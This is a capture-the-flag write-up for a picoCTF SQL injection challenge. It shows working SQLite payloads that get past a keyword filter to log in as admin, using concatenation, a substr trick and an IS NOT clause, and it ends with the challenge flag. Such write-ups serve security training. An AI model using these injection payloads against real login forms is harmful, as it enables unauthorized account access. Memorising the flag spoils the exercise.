Write-up author: jon-brandy
If the flag is not displayed after completing this challenge, try clearing your cookies.
Cookies set by other challenges may prevent the flag from displaying properly.
This website looks familiar... Log in as admin Site: http://mercury.picoctf.net:57359/ Filter: http://mercury.picoctf.net:57359/filter.php
- I tried to make it a little bit less contrived since the mini competition.
- Each filter is separated by a space. Spaces are not filtered.
- There is only 1 round this time, when you beat it the flag will be in filter.php.
- There is a length component now.
- sqlite
- First, open the website ->
http://mercury.picoctf.net:57359/
. - Try to input the user as
admin
and password asadmin
, then clicksign in
.
- It said
filtered
.
- Now try to open the
http://mercury.picoctf.net:57359/filter.php
.
- We can conclude that the website does filter few entities.
- Next, let's try to input the unfiltered word, in this case i tried to input
user
as username andpass
as password.
- It said
not admin
. Means we must use the username asadmin
but we need to bypass it.
- Since concatenation is not prohibited, then the easiest bypass is to use
||
for concatenation at the username. Now inputad'||'min
as username andpass
as password. - It still gave us a response ->
not admin
.
- Now let's remodel this query:
- Change the query to this:
SELECT username, password FROM users WHERE username='ad'||'min'||substr(' AND password=',0,0)||''
- Based from the query, we fill the username as
ad'||'min'||substr(
and the password as,0,0)||'
.
- Now open the
filter.php
file. Finally we got the flag!
ALTERNATE SOLUTIONS (USING SQLite)
- If you want to use sqlite, for username still using concatenation ->
ad'||'min
. For the password you can use the SQLite logical property ->IS NOT
.
- Now input the username as
ad'||'min
and the password asa' IS NOT 'b
.
SQLite CheatSheet
https://www.tutorialspoint.com/sqlite/sqlite_operators.htm
picoCTF{0n3_m0r3_t1m3_d5a91d8c2ae4ce567c2e8b8453305565}